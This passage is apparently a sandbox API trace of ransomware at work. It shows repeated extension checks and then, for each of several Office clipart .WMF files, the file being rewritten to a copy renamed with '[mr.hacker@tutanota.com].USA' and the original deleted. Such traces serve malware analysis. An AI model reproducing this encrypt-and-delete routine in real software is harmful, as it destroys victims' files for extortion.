lstrlenW (lpString=".7z") returned 3 [0268.766] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.766] lstrlenW (lpString=".dbf") returned 4 [0268.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.766] lstrlenW (lpString=".1cd") returned 4 [0268.766] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.766] lstrlenW (lpString=".jpg") returned 4 [0268.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.766] lstrlenW (lpString=".doc") returned 4 [0268.766] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.766] lstrlenW (lpString=".docx") returned 5 [0268.767] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.767] lstrlenW (lpString=".pdf") returned 4 [0268.767] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.767] lstrlenW (lpString=".xls") returned 4 [0268.767] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.767] lstrlenW (lpString=".xlsx") returned 5 [0268.767] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.767] lstrlenW (lpString=".ppt") returned 4 [0268.767] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.767] lstrlenW (lpString=".zip") returned 4 [0268.767] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.767] lstrlenW (lpString=".rar") returned 4 [0268.767] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.767] lstrlenW (lpString=".bz2") returned 4 [0268.767] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.767] lstrlenW (lpString=".7z") returned 3 [0268.767] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.767] lstrlenW (lpString=".dbf") returned 4 [0268.767] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.767] lstrlenW (lpString=".1cd") returned 4 [0268.767] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.767] lstrlenW (lpString=".jpg") returned 4 [0268.767] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.768] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.768] lstrlenW (lpString="DD00437_.WMF") returned 12 [0268.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.768] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=1932) returned 1 [0268.768] CloseHandle (hObject=0x37c) returned 1 [0268.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf")) returned 0x20 [0268.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0268.821] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.823] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.850] GetLastError () returned 0x0 [0268.850] ReadFile (in: hFile=0x388, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x78c, lpOverlapped=0x0) returned 1 [0268.879] WriteFile (in: hFile=0x390, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x790, lpOverlapped=0x0) returned 1 [0268.880] ReadFile (in: hFile=0x388, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.880] WriteFile (in: hFile=0x390, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.880] SetEndOfFile (hFile=0x390) returned 1 [0268.880] CloseHandle (hObject=0x390) returned 1 [0268.880] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.880] SetEndOfFile (hFile=0x388) returned 1 [0268.882] CloseHandle (hObject=0x388) returned 1 [0268.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.883] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf")) returned 1 [0268.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.883] lstrlenW (lpString=".doc") returned 4 [0268.883] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.883] lstrlenW (lpString=".docx") returned 5 [0268.883] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.883] lstrlenW (lpString=".pdf") returned 4 [0268.883] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.883] lstrlenW (lpString=".xls") returned 4 [0268.883] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.883] lstrlenW (lpString=".xlsx") returned 5 [0268.883] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.883] lstrlenW (lpString=".ppt") returned 4 [0268.883] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.884] lstrlenW (lpString=".zip") returned 4 [0268.884] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.884] lstrlenW (lpString=".rar") returned 4 [0268.884] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.884] lstrlenW (lpString=".bz2") returned 4 [0268.884] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.884] lstrlenW (lpString=".7z") returned 3 [0268.884] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.884] lstrlenW (lpString=".dbf") returned 4 [0268.884] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.884] lstrlenW (lpString=".1cd") returned 4 [0268.884] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.884] lstrlenW (lpString=".jpg") returned 4 [0268.884] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.884] lstrlenW (lpString=".doc") returned 4 [0268.884] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.884] lstrlenW (lpString=".docx") returned 5 [0268.884] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.884] lstrlenW (lpString=".pdf") returned 4 [0268.885] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.885] lstrlenW (lpString=".xls") returned 4 [0268.885] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.885] lstrlenW (lpString=".xlsx") returned 5 [0268.885] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.885] lstrlenW (lpString=".ppt") returned 4 [0268.885] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.885] lstrlenW (lpString=".zip") returned 4 [0268.885] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.885] lstrlenW (lpString=".rar") returned 4 [0268.885] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.885] lstrlenW (lpString=".bz2") returned 4 [0268.885] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.885] lstrlenW (lpString=".7z") returned 3 [0268.885] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.885] lstrlenW (lpString=".dbf") returned 4 [0268.885] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.885] lstrlenW (lpString=".1cd") returned 4 [0268.885] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0268.885] lstrlenW (lpString=".jpg") returned 4 [0268.885] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.886] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.886] lstrlenW (lpString="DD00448_.WMF") returned 12 [0268.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0268.893] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2952) returned 1 [0268.893] CloseHandle (hObject=0x388) returned 1 [0268.893] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf")) returned 0x20 [0268.896] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.898] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.898] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0268.899] GetLastError () returned 0x0 [0268.900] ReadFile (in: hFile=0x380, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xb88, lpOverlapped=0x0) returned 1 [0268.901] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xb90, lpOverlapped=0x0) returned 1 [0268.902] ReadFile (in: hFile=0x380, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.902] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.902] SetEndOfFile (hFile=0x394) returned 1 [0268.902] CloseHandle (hObject=0x394) returned 1 [0268.902] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.902] SetEndOfFile (hFile=0x380) returned 1 [0269.011] CloseHandle (hObject=0x380) returned 1 [0269.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.011] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf")) returned 1 [0269.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.012] lstrlenW (lpString=".doc") returned 4 [0269.012] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.012] lstrlenW (lpString=".docx") returned 5 [0269.012] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.012] lstrlenW (lpString=".pdf") returned 4 [0269.012] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.012] lstrlenW (lpString=".xls") returned 4 [0269.012] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.012] lstrlenW (lpString=".xlsx") returned 5 [0269.012] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.012] lstrlenW (lpString=".ppt") returned 4 [0269.012] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.012] lstrlenW (lpString=".zip") returned 4 [0269.012] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.012] lstrlenW (lpString=".rar") returned 4 [0269.012] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.012] lstrlenW (lpString=".bz2") returned 4 [0269.012] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.012] lstrlenW (lpString=".7z") returned 3 [0269.012] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.013] lstrlenW (lpString=".dbf") returned 4 [0269.013] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.013] lstrlenW (lpString=".1cd") returned 4 [0269.013] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.013] lstrlenW (lpString=".jpg") returned 4 [0269.013] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.013] lstrlenW (lpString=".doc") returned 4 [0269.013] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.013] lstrlenW (lpString=".docx") returned 5 [0269.013] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.013] lstrlenW (lpString=".pdf") returned 4 [0269.013] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.013] lstrlenW (lpString=".xls") returned 4 [0269.013] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.013] lstrlenW (lpString=".xlsx") returned 5 [0269.013] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.013] lstrlenW (lpString=".ppt") returned 4 [0269.013] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.013] lstrlenW (lpString=".zip") returned 4 [0269.013] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.014] lstrlenW (lpString=".rar") returned 4 [0269.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.014] lstrlenW (lpString=".bz2") returned 4 [0269.014] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.014] lstrlenW (lpString=".7z") returned 3 [0269.014] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.014] lstrlenW (lpString=".dbf") returned 4 [0269.014] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.014] lstrlenW (lpString=".1cd") returned 4 [0269.014] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0269.014] lstrlenW (lpString=".jpg") returned 4 [0269.014] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.014] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.014] lstrlenW (lpString="DD00687_.WMF") returned 12 [0269.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0269.015] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=20784) returned 1 [0269.015] CloseHandle (hObject=0x380) returned 1 [0269.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf")) returned 0x20 [0269.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0269.015] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.015] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0269.015] GetLastError () returned 0x0 [0269.016] ReadFile (in: hFile=0x380, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x5130, lpOverlapped=0x0) returned 1 [0269.018] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x5140, lpOverlapped=0x0) returned 1 [0269.019] ReadFile (in: hFile=0x380, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.019] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.019] SetEndOfFile (hFile=0x394) returned 1 [0269.019] CloseHandle (hObject=0x394) returned 1 [0269.019] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.019] SetEndOfFile (hFile=0x380) returned 1 [0269.021] CloseHandle (hObject=0x380) returned 1 [0269.022] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.022] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf")) returned 1 [0269.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.022] lstrlenW (lpString=".doc") returned 4 [0269.022] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.022] lstrlenW (lpString=".docx") returned 5 [0269.022] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.022] lstrlenW (lpString=".pdf") returned 4 [0269.022] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.023] lstrlenW (lpString=".xls") returned 4 [0269.023] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.023] lstrlenW (lpString=".xlsx") returned 5 [0269.023] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.023] lstrlenW (lpString=".ppt") returned 4 [0269.023] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.023] lstrlenW (lpString=".zip") returned 4 [0269.023] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.023] lstrlenW (lpString=".rar") returned 4 [0269.023] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.023] lstrlenW (lpString=".bz2") returned 4 [0269.023] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.023] lstrlenW (lpString=".7z") returned 3 [0269.023] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.023] lstrlenW (lpString=".dbf") returned 4 [0269.023] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.023] lstrlenW (lpString=".1cd") returned 4 [0269.023] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.023] lstrlenW (lpString=".jpg") returned 4 [0269.023] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.024] lstrlenW 